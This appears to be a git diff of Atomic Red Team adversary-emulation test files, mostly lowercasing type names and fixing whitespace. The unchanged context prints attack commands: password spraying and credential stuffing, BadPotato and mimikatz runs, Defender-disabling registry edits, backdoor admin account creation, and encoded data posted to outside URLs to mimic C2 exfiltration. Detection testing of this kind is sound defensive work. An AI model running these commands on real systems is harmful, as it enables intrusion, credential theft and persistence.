c6f25ec3-6475-47a9-b75d-09ac593c5ecb - description: | + description: | Test a single password against a list of users supported_platforms: - windows input_arguments: domaincontroller: description: Domain controller where test will be run - type: String + type: string default: $ENV:userdnsdomain domain: description: Domain where you will be testing - type: String + type: string default: $ENV:userdomain dependency_executor_name: powershell dependencies: @@ -297,22 +297,22 @@ atomic_tests: input_arguments: aws_account_id: description: ID of the AWS account - type: String + type: string default: "XXXXXXXX" dependencies: - - description: | - Check if go is installed - prereq_command: | - go version - get_prereq_command: | - echo Install GO + - description: | + Check if go is installed + prereq_command: | + go version + get_prereq_command: | + echo Install GO executor: command: | - cd /tmp - git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git - cd /tmp/GoAWSConsoleSpray - go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt + cd /tmp + git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git + cd /tmp/GoAWSConsoleSpray + go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt cleanup_command: | - rm -rf /tmp/GoAWSConsoleSpray + rm -rf /tmp/GoAWSConsoleSpray name: sh - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index 22d3c5ec..df4c510e 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1110.004 display_name: 'Brute Force: Credential Stuffing' @@ -9,22 +8,22 @@ atomic_tests: Using username,password combination from a password dump to login over SSH. supported_platforms: - - linux + - linux input_arguments: target_host: description: IP Address / Hostname you want to target. - type: String + type: string default: localhost dependency_executor_name: bash dependencies: - - description: | - Requires SSHPASS - prereq_command: | - if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - get_prereq_command: | - if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; + - description: | + Requires SSHPASS + prereq_command: | + if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; executor: name: bash @@ -39,23 +38,23 @@ atomic_tests: Using username,password combination from a password dump to login over SSH. supported_platforms: - - macos + - macos input_arguments: target_host: description: IP Address / Hostname you want to target. - type: String + type: string default: localhost dependency_executor_name: bash dependencies: - - description: | - Requires SSHPASS - prereq_command: | - if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - get_prereq_command: | - /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)" - brew install hudochenkov/sshpass/sshpass + - description: | + Requires SSHPASS + prereq_command: | + if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)" + brew install hudochenkov/sshpass/sshpass executor: name: bash @@ -66,18 +65,18 @@ atomic_tests: - name: Brute Force:Credential Stuffing using Kerbrute Tool auto_generated_guid: 4852c630-87a9-409b-bb5e-5dc12c9ebcde - description: | + description: | Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack supported_platforms: - windows input_arguments: domaincontroller: description: Domain controller where test will be run - type: String + type: string default: $ENV:userdnsdomain domain: description: Domain where you will be testing - type: String + type: string default: $ENV:userdomain dependency_executor_name: powershell dependencies: @@ -93,7 +92,7 @@ atomic_tests: if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1} get_prereq_command: | invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt" - executor: + executor: name: powershell elevation_required: false command: | diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 00da411e..dc55d583 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -25,7 +25,7 @@ atomic_tests: input_arguments: new_executable: description: New executable to run on startup instead of Windows Defender - type: String + type: string default: calc.exe executor: command: | @@ -62,7 +62,7 @@ atomic_tests: input_arguments: bad_domain: description: Domain to add to trusted site zone - type: String + type: string default: bad-domain.com executor: command: | @@ -99,7 +99,7 @@ atomic_tests: input_arguments: default_execution_policy: description: Specify the default poweshell execution policy - type: String + type: string default: Default executor: command: | @@ -225,7 +225,7 @@ atomic_tests: reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1 name: command_prompt elevation_required: true -- name: Disable Windows LogOff Button +- name: Disable Windows LogOff Button auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. @@ -343,7 +343,7 @@ atomic_tests: cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true - name: Activate Windows NoClose Group Policy Feature auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723 description: | @@ -358,7 +358,7 @@ atomic_tests: cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true - name: Activate Windows NoSetTaskbar Group Policy Feature auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed description: | @@ -622,8 +622,8 @@ atomic_tests: - name: Ursnif Malware Registry Key Creation auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0 description: | - Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\ - More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/ + Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\ + More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/ supported_platforms: - windows executor: @@ -636,7 +636,7 @@ atomic_tests: - name: Terminal Server Client Connection History Cleared auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21 description: | - The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer + The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer supported_platforms: - windows dependency_executor_name: powershell @@ -696,7 +696,7 @@ atomic_tests: auto_generated_guid: fe7974e5-5813-477b-a7bd-311d4f535e83 description: | Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP. - + See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/) supported_platforms: - windows @@ -734,4 +734,4 @@ atomic_tests: cleanup_command: | reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index fd54b103..1832a6bc 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: Path + type: path default: /tmp/T1113_desktop.png executor: command: | @@ -27,7 +27,7 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: Path + type: path default: /tmp/T1113_desktop.png executor: command: | @@ -44,15 +44,15 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: Path + type: path default: /tmp/T1113_desktop.xwd package_checker: description: Package checking command for linux. Debian system command- dpkg -s x11-apps - type: String + type: string default: rpm -q xorg-x11-apps package_installer: description: Package installer command for linux. Debian system command- apt-get install x11-apps - type: String + type: string default: yum install -y xorg-x11-apps dependency_executor_name: bash dependencies: @@ -78,7 +78,7 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: Path + type: path default: /tmp/T1113_desktop.png dependencies: - description: | @@ -98,15 +98,15 @@ atomic_tests: description: | Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour supported_platforms: - - windows + - windows input_arguments: output_file: description: Output file path - type: Path + type: path default: c:\temp\T1113_desktop.zip recording_time: description: Time to take screenshots - type: String + type: string default: 5 executor: name: powershell @@ -129,7 +129,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: $env:TEMP\T1113.png executor: command: | diff --git a/atomics/T1114.001/T1114.001.yaml b/atomics/T1114.001/T1114.001.yaml index 087e4d82..9ae41060 100644 --- a/atomics/T1114.001/T1114.001.yaml +++ b/atomics/T1114.001/T1114.001.yaml @@ -13,11 +13,11 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: String + type: string default: $env:TEMP\mail.csv file_path: description: File path for Get-Inbox.ps1 - type: String + type: string default: PathToAtomicsFolder\T1114.001\src dependency_executor_name: powershell dependencies: @@ -33,4 +33,3 @@ atomic_tests: cleanup_command: | Remove-Item #{output_file} -Force -ErrorAction Ignore name: powershell - diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml index 7c6ed413..bcfb52de 100644 --- a/atomics/T1114.003/T1114.003.yaml +++ b/atomics/T1114.003/T1114.003.yaml @@ -10,19 +10,19 @@ atomic_tests: input_arguments: username: description: office-365 username - type: String - default: null + type: string + default: password: description: office-365 password - type: String - default: null + type: string + default: rule_name: description: email rule name - type: String + type: string default: "Atomic Red Team Email Rule" forwarding_email: description: destination email addresses - type: String + type: string default: "Atomic_Operator@fakeemail.aq" dependency_executor_name: powershell dependencies: diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index 0e64b40a..96a03ae5 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -45,7 +45,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -80,4 +80,4 @@ atomic_tests: apt install xclip -y history | tail -n 30 | xclip -sel clip xclip -o > history.txt - name: sh \ No newline at end of file + name: sh diff --git a/atomics/T1123/T1123.yaml b/atomics/T1123/T1123.yaml index 8018a1bf..79459a80 100644 --- a/atomics/T1123/T1123.yaml +++ b/atomics/T1123/T1123.yaml @@ -29,26 +29,26 @@ atomic_tests: - name: using Quicktime Player auto_generated_guid: c7a0bb71-70ce-4a53-b115-881f241b795b description: | - Use AppleScript to get Quicktime Player to record an audio file from the default microphone. + Use AppleScript to get Quicktime Player to record an audio file from the default microphone. - Should create a non-empty m4a file with sound from the microphone. + Should create a non-empty m4a file with sound from the microphone. - - requires Automation permissions but no additional microphone permissions - - saves file in /tmp by default. Other locations likely to require more permissions. + - requires Automation permissions but no additional microphone permissions + - saves file in /tmp by default. Other locations likely to require more permissions. supported_platforms: - macos input_arguments: filename: description: Location of the script - type: Path + type: path default: PathToAtomicsFolder/T1123/src/T1123.sh audiofile: description: Location of the recorded audio file - type: Path + type: path default: /tmp/T1123.m4a duration: description: Length of recording to make in seconds - type: Integer + type: integer default: 5 executor: command: | @@ -57,4 +57,4 @@ atomic_tests: if test -w #{audiofile}; then rm #{audiofile} fi - name: sh \ No newline at end of file + name: sh diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml index 0d63951d..5197f5a1 100644 --- a/atomics/T1124/T1124.yaml +++ b/atomics/T1124/T1124.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: computer_name: description: computer name to query - type: String + type: string default: localhost executor: command: | @@ -32,7 +32,7 @@ atomic_tests: description: | Identify system time. Upon execution, the local computer system time and timezone will be displayed. supported_platforms: - - macos + - macos executor: command: | date diff --git a/atomics/T1127.001/T1127.001.yaml b/atomics/T1127.001/T1127.001.yaml index 209675a0..36238b63 100644 --- a/atomics/T1127.001/T1127.001.yaml +++ b/atomics/T1127.001/T1127.001.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1127.001\src\T1127.001.csproj msbuildpath: description: Default location of MSBuild - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 msbuildname: description: Default name of MSBuild - type: Path + type: path default: msbuild.exe dependency_executor_name: powershell dependencies: @@ -43,15 +43,15 @@ atomic_tests: input_arguments: filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1127.001\src\vb.xml msbuildpath: description: Default location of MSBuild - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 msbuildname: description: Default name of MSBuild - type: Path + type: path default: msbuild.exe dependency_executor_name: powershell dependencies: @@ -65,4 +65,4 @@ atomic_tests: executor: command: | #{msbuildpath}\#{msbuildname} #{filename} - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index eb12d932..3079fc57 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -12,15 +12,15 @@ atomic_tests: input_arguments: filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1127\src\hello.js jscpath: description: Default location of jsc.exe - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 jscname: description: Default name of jsc - type: Path + type: path default: jsc.exe dependency_executor_name: powershell dependencies: @@ -51,15 +51,15 @@ atomic_tests: input_arguments: filename: description: Location of the project file - type: Path + type: path default: PathToAtomicsFolder\T1127\src\LibHello.js jscpath: description: Default location of jsc.exe - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 jscname: description: Default name of jsc - type: Path + type: path default: jsc.exe dependency_executor_name: powershell dependencies: @@ -77,4 +77,4 @@ atomic_tests: cleanup_command: | del %TEMP%\LibHello.js del %TEMP%\LibHello.dll - name: command_prompt + name: command_prompt diff --git a/atomics/T1132.001/T1132.001.yaml b/atomics/T1132.001/T1132.001.yaml index b9b8866f..d98a4476 100644 --- a/atomics/T1132.001/T1132.001.yaml +++ b/atomics/T1132.001/T1132.001.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: destination_url: description: Destination URL to post encoded data. - type: Url + type: url default: redcanary.com base64_data: description: Encoded data to post using fake Social Security number 111-11-1111. - type: String + type: string default: MTExLTExLTExMTE= executor: command: | @@ -32,15 +32,15 @@ atomic_tests: input_arguments: destination_url: description: Destination URL to post encoded data. - type: Url + type: url default: example.com plaintext: description: Plain text mimicking victim data sent to C2 server. - type: String + type: string default: Path\n----\nC:\Users\victim key: description: XOR key used for encoding the plaintext. - type: String + type: string default: abcdefghijklmnopqrstuvwxyz123456 executor: command: | diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml index 8ffb1f5e..68f973f9 100644 --- a/atomics/T1133/T1133.yaml +++ b/atomics/T1133/T1133.yaml @@ -1,6 +1,5 @@ ---- -attack_technique: T1133 -display_name: External Remote Services +attack_technique: T1133 +display_name: External Remote Services atomic_tests: - name: Running Chrome VPN Extensions via the Registry 2 vpn extension @@ -8,29 +7,29 @@ atomic_tests: description: | Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list supported_platforms: - - windows + - windows input_arguments: chrome_url: description: chrome installer download URL - type: Url + type: url default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe extension_id: description: chrome extension id - type: String - default: | + type: string + default: | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" dependency_executor_name: powershell - dependencies: - - description: | - Chrome must be installed - prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' - get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} - Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + dependencies: + - description: | + Chrome must be installed + prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S executor: name: powershell elevation_required: true - command: | + command: | $extList = #{extension_id} foreach ($extension in $extList) { New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force @@ -38,7 +37,7 @@ atomic_tests: Start chrome Start-Sleep -Seconds 30 Stop-Process -Name "chrome" - cleanup_command: | + cleanup_command: | $extList = #{extension_id} foreach ($extension in $extList) { Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml index e888d95e..454f89b9 100644 --- a/atomics/T1134.001/T1134.001.yaml +++ b/atomics/T1134.001/T1134.001.yaml @@ -39,7 +39,7 @@ atomic_tests: input_arguments: nsudo_path: description: 'Path to the NSudo bat file' - type: Path + type: path default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe dependency_executor_name: powershell dependencies: @@ -54,9 +54,9 @@ atomic_tests: Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore executor: command: | - Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd" - Start-Sleep -Second 5 - Stop-Process -Name "cmd" -force -erroraction silentlycontinue + Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd" + Start-Sleep -Second 5 + Stop-Process -Name "cmd" -force -erroraction silentlycontinue name: powershell - name: Bad Potato auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448 @@ -66,7 +66,7 @@ atomic_tests: supported_platforms: - windows dependency_executor_name: powershell - dependencies: + dependencies: - description: | BadPotato.exe must exist in the temp directory prereq_command: | @@ -75,12 +75,12 @@ atomic_tests: Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true" executor: command: | - cd $env:temp - Start-Process .\BadPotato.exe notepad.exe - Start-Sleep -Second 20 - Stop-Process -Name "notepad" -force -erroraction silentlycontinue - Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue + cd $env:temp + Start-Process .\BadPotato.exe notepad.exe + Start-Sleep -Second 20 + Stop-Process -Name "notepad" -force -erroraction silentlycontinue + Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue cleanup_command: | taskkill /f /im notepad.exe name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml index e05ab373..7de29473 100644 --- a/atomics/T1134.004/T1134.004.yaml +++ b/atomics/T1134.004/T1134.004.yaml @@ -14,23 +14,23 @@ atomic_tests: input_arguments: parent_process_name: description: Name of the parent process - type: String + type: string default: explorer spawnto_process_path: description: Path of the process to spawn - type: Path + type: path default: C:\Program Files\Internet Explorer\iexplore.exe dll_process_name: description: Name of the created process from the injected dll - type: String + type: string default: calculator dll_path: description: Path of the dll to inject - type: Path + type: path default: PathToAtomicsFolder\T1134.004\bin\calc.dll spawnto_process_name: description: Name of the process to spawn - type: String + type: string default: iexplore dependency_executor_name: powershell dependencies: @@ -65,15 +65,15 @@ atomic_tests: input_arguments: file_path: description: File path or name of process to spawn - type: Path + type: path default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe parent_pid: description: PID of process to spawn from - type: String + type: string default: $PID command_line: description: Specified command line to use - type: String + type: string default: -Command Start-Sleep 10 dependencies: - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. @@ -94,11 +94,11 @@ atomic_tests: input_arguments: parent_pid: description: PID of process to spawn from - type: String + type: string default: $PID test_guid: description: Defined test GUID - type: String + type: string default: 12345678-1234-1234-1234-123456789123 dependencies: - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. @@ -119,11 +119,11 @@ atomic_tests: input_arguments: command_line: description: Specified command line to use - type: String + type: string default: -Command Start-Sleep 10 file_path: description: File path or name of process to spawn - type: Path + type: path default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. @@ -144,15 +144,15 @@ atomic_tests: input_arguments: command_line: description: Specified command line to use - type: String + type: string default: -Command Start-Sleep 10 file_path: description: File path or name of process to spawn - type: Path + type: path default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe parent_name: description: Parent process to spoof from - type: Path + type: path default: $Env:windir\System32\notepad.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module. diff --git a/atomics/T1134.005/T1134.005.yaml b/atomics/T1134.005/T1134.005.yaml index ae078537..20511cae 100644 --- a/atomics/T1134.005/T1134.005.yaml +++ b/atomics/T1134.005/T1134.005.yaml @@ -6,19 +6,19 @@ atomic_tests: description: | Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller supported_platforms: - - windows + - windows input_arguments: sid_to_inject: description: SID to inject into sidhistory - type: String + type: string default: S-1-5-21-1004336348-1177238915-682003330-1134 sam_account_name: description: Target account to modify - type: String + type: string default: '$env:username' mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '$env:TEMP\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index d5304b29..79e4e6ae 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: computer_name: description: Computer name to find a mount on. - type: String + type: string default: computer1 executor: command: | @@ -27,11 +27,11 @@ atomic_tests: input_arguments: package_checker: description: Package checking command. Debian - dpkg -s samba - type: String + type: string default: (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed) package_installer: description: Package installer command. Debian - apt install samba - type: String + type: string default: (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba) dependency_executor_name: bash dependencies: @@ -56,7 +56,7 @@ atomic_tests: input_arguments: computer_name: description: Computer name to find a mount on. - type: String + type: string default: localhost executor: command: | @@ -109,7 +109,7 @@ atomic_tests: input_arguments: parameters: description: ShareFinder parameter - type: String + type: string default: -CheckShareAccess dependencies: - description: Invoke-ShareFinder module must exist in %TEMP% directory diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml index d345cd14..e076be85 100644 --- a/atomics/T1136.001/T1136.001.yaml +++ b/atomics/T1136.001/T1136.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: evil_user executor: command: | @@ -28,11 +28,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: evil_user realname: description: "'realname' to record when creating the user" - type: String + type: string default: Evil Account executor: command: | @@ -56,11 +56,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: T1136.001_CMD password: description: Password of the user to create - type: String + type: string default: T1136.001_CMD! executor: command: | @@ -79,7 +79,7 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: T1136.001_PowerShell executor: command: | @@ -97,11 +97,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: butter password: description: Password of the user to create - type: String + type: string default: BetterWithButter executor: command: | @@ -120,11 +120,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: T1136.001_Admin password: description: Password of the user to create - type: String + type: string default: T1136_pass executor: command: | diff --git a/atomics/T1136.002/T1136.002.yaml b/atomics/T1136.002/T1136.002.yaml index c8a4875e..50c65c58 100644 --- a/atomics/T1136.002/T1136.002.yaml +++ b/atomics/T1136.002/T1136.002.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: T1136.002_Admin password: description: Password of the user to create - type: String + type: string default: T1136_pass123! group: description: Domain administrator group to which add the user to - type: String + type: string default: Domain Admins executor: command: | @@ -37,11 +37,11 @@ atomic_tests: input_arguments: username: description: Username of the user to create - type: String + type: string default: ANONYMOUS LOGON password: description: Password of the user to create - type: String + type: string default: T1136_pass123! executor: command: | @@ -59,11 +59,11 @@ atomic_tests: input_arguments: username: description: "Name of the Account to be created" - type: String + type: string default: T1136.002_Admin password: description: "Password of the Account to be created" - type: String + type: string default: T1136_pass123! executor: command: | diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml index 4083c296..8c1ecee0 100644 --- a/atomics/T1136.003/T1136.003.yaml +++ b/atomics/T1136.003/T1136.003.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: username: description: Username of the IAM user to create in AWS - type: String + type: string default: "atomicredteam" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | aws iam create-user --user-name #{username} diff --git a/atomics/T1137.004/T1137.004.yaml b/atomics/T1137.004/T1137.004.yaml index 1fa82435..8a97184d 100644 --- a/atomics/T1137.004/T1137.004.yaml +++ b/atomics/T1137.004/T1137.004.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1137.004 display_name: "Office Application Startup: Outlook Home Page" @@ -10,16 +9,16 @@ atomic_tests: Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). supported_platforms: - - windows + - windows input_arguments: url: description: URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) - type: String + type: string default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html outlook_version: - description: Version of Outlook that is installed - type: String + description: Version of Outlook that is installed + type: string default: 16.0 # Microsoft 365: 16.0 # Outlook 2019: 16.0 @@ -27,7 +26,7 @@ atomic_tests: # Outlook 2013: 15.0 outlook_folder: description: Name of the Outlook folder to modify the homepage setting for - type: String + type: string default: Inbox # Default folder names as they appear in the registry: https://support.microsoft.com/en-us/office/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04 executor: diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml index e4a21acc..1e4700d6 100644 --- a/atomics/T1140/T1140.yaml +++ b/atomics/T1140/T1140.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: executable: description: name of executable - type: Path + type: path default: C:\Windows\System32\calc.exe executor: command: | @@ -30,7 +30,7 @@ atomic_tests: input_arguments: executable: description: name of executable/file to decode - type: Path + type: path default: C:\Windows\System32\calc.exe executor: command: | @@ -52,19 +52,19 @@ atomic_tests: input_arguments: message: description: Message to print to the screen - type: String + type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text - type: Path + type: path default: /tmp/T1140.encoded dependencies: - - description: | - Python must be present - prereq_command: | - which python3 - get_prereq_command: | - echo "Please install Python 3" + - description: | + Python must be present + prereq_command: | + which python3 + get_prereq_command: | + echo "Please install Python 3" executor: name: sh elevation_required: false @@ -86,19 +86,19 @@ atomic_tests: input_arguments: message: description: Message to print to the screen - type: String + type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text - type: Path + type: path default: /tmp/T1140.encoded dependencies: - - description: | - Perl must be present - prereq_command: | - which perl - get_prereq_command: | - echo "Please install Perl" + - description: | + Perl must be present + prereq_command: | + which perl + get_prereq_command: | + echo "Please install Perl" executor: name: sh elevation_required: false @@ -117,11 +117,11 @@ atomic_tests: input_arguments: message: description: Message to print to the screen - type: String + type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text - type: Path + type: path default: /tmp/T1140.encoded executor: name: sh @@ -146,19 +146,19 @@ atomic_tests: input_arguments: message: description: Message to print to the screen - type: String + type: string default: Hello from Atomic Red Team test T1140! encoded_file: description: File to temporarily save encoded text - type: Path + type: path default: /tmp/T1140.encoded dependencies: - - description: | - xxd must be present - prereq_command: | - which xxd - get_prereq_command: | - echo "Please install xxd" + - description: | + xxd must be present + prereq_command: | + which xxd + get_prereq_command: | + echo 